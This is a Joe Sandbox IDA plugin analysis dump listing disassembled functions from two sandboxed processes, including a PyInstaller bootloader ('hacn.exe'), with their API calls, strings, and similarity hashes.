Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 38e73c9e905ca9147f99f7374e1fed4b54c6cac0a33e35c7685abfd877abcc17
Instruction ID: 3cdcbecbac7e7fed318e8494834dc8c093881c93590b543b206032ca425cf631
Opcode Fuzzy Hash: 38e73c9e905ca9147f99f7374e1fed4b54c6cac0a33e35c7685abfd877abcc17
Instruction Fuzzy Hash: 9101F563A0431179DB237B759C46D6BA7ECDED5760742C41AF444CA586FB21D840C3A1

Function 003810F9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0038130A
___raise_securityfailure.LIBCMT ref: 003813F2

Strings

8]<, xrefs: 003813ED

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8]<
API String ID: 3761405300-4114821796
Opcode ID: 775b46cbb51f73790103fc6d2fa183c8b2b49e7b92da1bb002ec28f9921de05a
Instruction ID: ce617febc15f333a932e1e281d1228dfb943a33de265c40b6abd32ca7a11cbb2
Opcode Fuzzy Hash: 775b46cbb51f73790103fc6d2fa183c8b2b49e7b92da1bb002ec28f9921de05a
Instruction Fuzzy Hash: FB21EEB5510B009BD712DF29E88AA857BACBB59315F50502AE909CA6A1E3B1BAC18B44

Function 0037D392 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,?), ref: 0037D3A1
GetLastError.KERNEL32 ref: 0037D3CC

Strings

@8, xrefs: 0037D3A8

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: CurrentErrorLastProcess
String ID: @8
API String ID: 335030130-1981503237
Opcode ID: bd2a9c4722a3cb76cb388dbf319ae3ec74c40e172e1277dfb4906303e495ffe1
Instruction ID: d612b913d25ae34687f6cf2da4d821de40028bcbb8d2ce802d77e0792f1f89a7
Opcode Fuzzy Hash: bd2a9c4722a3cb76cb388dbf319ae3ec74c40e172e1277dfb4906303e495ffe1
Instruction Fuzzy Hash: 75016D75500218FFDB235FA2EC8AEEE7B7DEF04350F104065F905E1150EA76AE40AB20

Function 0038E19E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0038B9A5: GetLastError.KERNEL32(?,003A50C4,00386E12,003A50C4,?,?,0038688D,?,?,003A50C4), ref: 0038B9A9
Part of subcall function 0038B9A5: _free.LIBCMT ref: 0038B9DC
Part of subcall function 0038B9A5: SetLastError.KERNEL32(00000000,?,003A50C4), ref: 0038BA1D
Part of subcall function 0038B9A5: _abort.LIBCMT ref: 0038BA23

_abort.LIBCMT ref: 0038E1D0
_free.LIBCMT ref: 0038E204

Strings

p,:, xrefs: 0038E1FB

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: p,:
API String ID: 289325740-1418527582
Opcode ID: 688102bf24086eaab1bc7d1094754b9ea8d0dd68d778e99aa297fa8423036304
Instruction ID: 9d43bb9392d39519a82c052beb27fdf49cd8d712848275ff05ae9d7c95eb1ffd
Opcode Fuzzy Hash: 688102bf24086eaab1bc7d1094754b9ea8d0dd68d778e99aa297fa8423036304
Instruction Fuzzy Hash: B4018071D01726DBCB23BF6DC80165EF368BF09B21B16069AE8646B680CB706D428FC1

Function 00381405 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00381410
___raise_securityfailure.LIBCMT ref: 003814CD

Strings

8]<, xrefs: 003814C8

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8]<
API String ID: 3761405300-4114821796
Opcode ID: f085c287b9439c6e82aaf8bafe08b1245a7e80b8bcd098514e3ff608b36a4534
Instruction ID: 24eab6cd7186e0eb3d34a0ce651558cdb4a2bca77c0b37c5f15425218c23845d
Opcode Fuzzy Hash: f085c287b9439c6e82aaf8bafe08b1245a7e80b8bcd098514e3ff608b36a4534
Instruction Fuzzy Hash: 6211C0B5511B04DBC712DF25E889A857BBDBB28301F00502AE809CB3A1E3B1BAC18F45

Function 003730CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,003731E7,?,?,0037325F,?,?,?,?,?,00373249), ref: 003730D0
GetLastError.KERNEL32(?,?,0037325F,?,?,?,?,?,00373249), ref: 003730DC

Part of subcall function 00367BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00367BD5

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 003730E5

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 0a2d2345a8b76feb2d4dd66e66db7b9973e642b0fc328b3b989581bcb12b19b7
Instruction ID: 0472d178a25ff30daef0d20c29541017b5b153a4fd0a3b26d4d6b0524895803b
Opcode Fuzzy Hash: 0a2d2345a8b76feb2d4dd66e66db7b9973e642b0fc328b3b989581bcb12b19b7
Instruction Fuzzy Hash: 13D05E3250D53437DA1333246C0BDAE3D09DB62335FA18755F5396A2E9CA614D5182D1

Function 003701FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0036F951,?), ref: 003701FF
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0036F951,?), ref: 0037020D

Strings

RTL, xrefs: 00370207

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 114977dc2fba3f67c6c5e317b5e0269e38d54cfdf83ba9737bd9ab5f3d05ecd2
Instruction ID: a9b6a4af5f3424532278095cca029c313517dd8da83bfe6b1c3e1f32ead78651
Opcode Fuzzy Hash: 114977dc2fba3f67c6c5e317b5e0269e38d54cfdf83ba9737bd9ab5f3d05ecd2
Instruction Fuzzy Hash: 40C0123128575096DA3257716C4FB832E586B00711F051449F545DA2C1D6E7C8418660

Analysis Process: hacn.exePID: 7800, Parent PID: 7736COMMON

Executed Functions

Function 00007FF647796470 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6477964B5

Part of subcall function 00007FF647795E08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647795E1C

Part of subcall function 00007FF64778B00C: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF647793492,?,?,?,00007FF6477934CF,?,?,00000000,00007FF647793995,?,?,00000000,00007FF6477938C7), ref: 00007FF64778B022
Part of subcall function 00007FF64778B00C: GetLastError.KERNEL32(?,?,?,00007FF647793492,?,?,?,00007FF6477934CF,?,?,00000000,00007FF647793995,?,?,00000000,00007FF6477938C7), ref: 00007FF64778B02C

Part of subcall function 00007FF64778AFC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF64778AFA3,?,?,?,?,?,00007FF6477831CC), ref: 00007FF64778AFCD
Part of subcall function 00007FF64778AFC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF64778AFA3,?,?,?,?,?,00007FF6477831CC), ref: 00007FF64778AFF2

_get_daylight.LIBCMT ref: 00007FF6477964A4

Part of subcall function 00007FF647795E68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647795E7C

_get_daylight.LIBCMT ref: 00007FF64779671A
_get_daylight.LIBCMT ref: 00007FF64779672B
_get_daylight.LIBCMT ref: 00007FF64779673C
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64779697C), ref: 00007FF647796763

Strings

Eastern Summer Time, xrefs: 00007FF647796821
Eastern Standard Time, xrefs: 00007FF647796809

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$BoundaryCurrentDeleteDescriptorErrorFeatureInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3714727158-239921721
Opcode ID: 0fbca74829f5eb391b29e48272e935aab84cd8bbcbc1d6e9a96b388f8462614d
Instruction ID: ea788e05cfad9ecb2c19039072f8ed066732795e1d066173453ce76e43e4665d
Opcode Fuzzy Hash: 0fbca74829f5eb391b29e48272e935aab84cd8bbcbc1d6e9a96b388f8462614d
Instruction Fuzzy Hash: D0D1C0A2A0D252C6F720BF32D8915B96761EF64B98FC18236EE0DC7695DE3CE441C348

Function 00007FF6477973BC Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6477970F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647797131
Part of subcall function 00007FF6477970F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6477971AF
Part of subcall function 00007FF6477970F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647797200

CreateFileW.KERNELBASE ref: 00007FF6477974C2
CreateFileW.KERNEL32 ref: 00007FF647797512
GetLastError.KERNEL32 ref: 00007FF647797542
GetFileType.KERNELBASE ref: 00007FF647797557
GetLastError.KERNEL32 ref: 00007FF647797561
CloseHandle.KERNEL32 ref: 00007FF647797594
CloseHandle.KERNEL32 ref: 00007FF6477976F7
CreateFileW.KERNEL32 ref: 00007FF64779772C
GetLastError.KERNEL32 ref: 00007FF64779773B

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
Instruction ID: 185680227e5c2950c75ab5d0b210747a67d5174e573ff7ed3070abf9c47ce1a7
Opcode Fuzzy Hash: 3a34930d5f91773cec3df5f99ae8c8b4927d9c8c66a9e1d3c980e3b08bacfc22
Instruction Fuzzy Hash: 95C1C076B29A42C5FB50EFA8C4806AC3765FB59BA8B810225DE1E9B3E5CF38D451C344

Function 00007FF647777960 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF64777154F), ref: 00007FF6477779F7

Part of subcall function 00007FF647777B70: GetEnvironmentVariableW.KERNEL32(00007FF647773A1F), ref: 00007FF647777BAA
Part of subcall function 00007FF647777B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF647777BC7

Part of subcall function 00007FF647787EEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647787F05

SetEnvironmentVariableW.KERNEL32 ref: 00007FF647777AB1

Part of subcall function 00007FF647772B30: MessageBoxW.USER32 ref: 00007FF647772C05

Strings

LOADER: Failed to set the TMP environment variable., xrefs: 00007FF6477779DA
TMP, xrefs: 00007FF64777799A, 00007FF647777A59, 00007FF647777AE7
_MEI%d, xrefs: 00007FF647777A05
TMP, xrefs: 00007FF6477779C0

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
API String ID: 3752271684-1116378104
Opcode ID: 4444cf2387327459b36d36c56f83932e68c7841fa26f52f393da3f83a2012f24
Instruction ID: 579c13fbcbc25f6f8de22b7bf75346f22668a9db712f623b6daf1ddd1a4613b4
Opcode Fuzzy Hash: 4444cf2387327459b36d36c56f83932e68c7841fa26f52f393da3f83a2012f24
Instruction Fuzzy Hash: F9518051B0D653C1FE54B736A9222BA5345AF9ABC0FC54431ED0ECB7A7ED2DF5018288

Function 00007FF6477966EC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF64779671A

Part of subcall function 00007FF647795E68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647795E7C

_get_daylight.LIBCMT ref: 00007FF64779672B

Part of subcall function 00007FF647795E08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647795E1C

_get_daylight.LIBCMT ref: 00007FF64779673C

Part of subcall function 00007FF647795E38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF647795E4C

Part of subcall function 00007FF64778B00C: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF647793492,?,?,?,00007FF6477934CF,?,?,00000000,00007FF647793995,?,?,00000000,00007FF6477938C7), ref: 00007FF64778B022
Part of subcall function 00007FF64778B00C: GetLastError.KERNEL32(?,?,?,00007FF647793492,?,?,?,00007FF6477934CF,?,?,00000000,00007FF647793995,?,?,00000000,00007FF6477938C7), ref: 00007FF64778B02C

GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64779697C), ref: 00007FF647796763

Strings

Eastern Summer Time, xrefs: 00007FF647796821
Eastern Standard Time, xrefs: 00007FF647796809

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$BoundaryDeleteDescriptorErrorInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 1511944507-239921721
Opcode ID: 5b5d09b228255999272c5ce90a56ec2a5c1c9b61d05c7224e163f0b1bb3d1365
Instruction ID: 2a13e88c432f7eae16cd91a5953f09ad02ec1ffae5113d119f895221f7ff19bf
Opcode Fuzzy Hash: 5b5d09b228255999272c5ce90a56ec2a5c1c9b61d05c7224e163f0b1bb3d1365
Instruction Fuzzy Hash: 06513972A1D652C6F720FF21E8915B96760BB58784F80423AEE4DC769ADF3CE4408748

Function 00007FF647791038 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: bc45aae4033a50195dd8df506693c608275109d72699b5b2474aa85e53b6b0b5
Instruction ID: b93c41161b188cf573c30b0481d11d01e27e819116108e0cf44b618725a141ee
Opcode Fuzzy Hash: bc45aae4033a50195dd8df506693c608275109d72699b5b2474aa85e53b6b0b5
Instruction Fuzzy Hash: 1502D1A1F0E646C0FA65FB2594002792690AF55BE0FD98A35DD6DC67E2EE3CF421830C

Function 00007FF647771710 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF647771806
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6477718F5
pyi_arch_extract2fs was called before temporary directory was initialized!, xrefs: 00007FF647771726
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF647771866
fwrite, xrefs: 00007FF6477718EC
malloc, xrefs: 00007FF64777186D
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6477717D9
Failed to create symbolic link %s!, xrefs: 00007FF647771753
fseek, xrefs: 00007FF64777180D
Failed to extract %s: failed to open target file!, xrefs: 00007FF647771790
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6477718E5
fread, xrefs: 00007FF6477718FC
fopen, xrefs: 00007FF647771797

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: Message
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
API String ID: 2030045667-3833288071
Opcode ID: 5255ee959a8f60209247e1ad93f54e2cb4c33fe61b594c51680441b7833373f6
Instruction ID: 80913753336d13212eb32b0904eb22a07f0eead83a4d75c30012a4e374377654
Opcode Fuzzy Hash: 5255ee959a8f60209247e1ad93f54e2cb4c33fe61b594c51680441b7833373f6
Instruction Fuzzy Hash: F651BAA1B0D682C6FA10BB25E8506B963A1FF95BD4FC00531DE1C876A6EE3CF645C708

Function 00007FF647771AA0 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6477782C0: _fread_nolock.LIBCMT ref: 00007FF64777836A

_fread_nolock.LIBCMT ref: 00007FF647771B54

Part of subcall function 00007FF647772890: MessageBoxW.USER32 ref: 00007FF64777299B

Strings

Failed to seek to cookie position!, xrefs: 00007FF647771B2C
malloc, xrefs: 00007FF647771BDD
Could not read full TOC!, xrefs: 00007FF647771C09
Failed to read cookie!, xrefs: 00007FF647771B5F
MEI, xrefs: 00007FF647771AE2
Could not allocate buffer for TOC!, xrefs: 00007FF647771BD6
fseek, xrefs: 00007FF647771B33
Error on file., xrefs: 00007FF647771C36
fread, xrefs: 00007FF647771B66, 00007FF647771C10

Memory Dump Source

Source File: 00000006.00000002.1909688350.00007FF647771000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF647770000, based on PE: true

Associated: 00000006.00000002.1909635955.00007FF647770000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909746001.00007FF64779B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909782085.00007FF6477B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000006.00000002.1909851816.00007FF6477B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff647770000_hacn.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
API String ID: 677216364-1384898525
Opcode ID: a6da9fc0af2ad67e63f89aa39b072a96458758f116bdca80824d6b80883f6e71
Instruction ID: 09ab04413a483b1c6dba054ba7534f771a1b0ea49e9269119024ec72b33df180
Opcode Fuzzy Hash: a6da9fc0af2ad67e63f89aa39b072a96458758f116bdca80824d6b80883f6e71
Instruction Fuzzy Hash: A25168B1A0D602C6EB14FB28E55017977A0EF88B94B958536DE0CC7BA9DE7CE440CB48

Function 00007FF647771000 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF647773ED0: GetModuleFileNameW.KERNEL32(?,00007FF6477739EA), ref: 00007FF647773F01

SetDllDirectoryW.KERNEL32 ref: 00007FF647773BF5

Part of subcall function 00007FF647777B70: GetEnvironmentVariableW.KERNEL32(00007FF647773A1F), ref: 00007FF647777BAA
Part of subcall function 00007FF647777B70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF647777BC7

Strings

Failed to convert DLL search path!, xrefs: 00007FF647773BE5
Cannot side-load external archive %s (code %d)!, xrefs: 00007FF647773B3F
Cannot open PyInstaller archive from executable (%s) or external archive (%s), xrefs: 00007FF647773AC6
MEI, xrefs: 00007FF647773AFA
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF647773B73
_MEIPASS2, xrefs: 00007FF647773A0B, 00007FF647773A74, 00007FF647773D27, 00007FF647773D33
_PYI_ONEDIR_MODE, xrefs: 00007FF647773A34, 00007FF647773A5F

Memory Dump Source

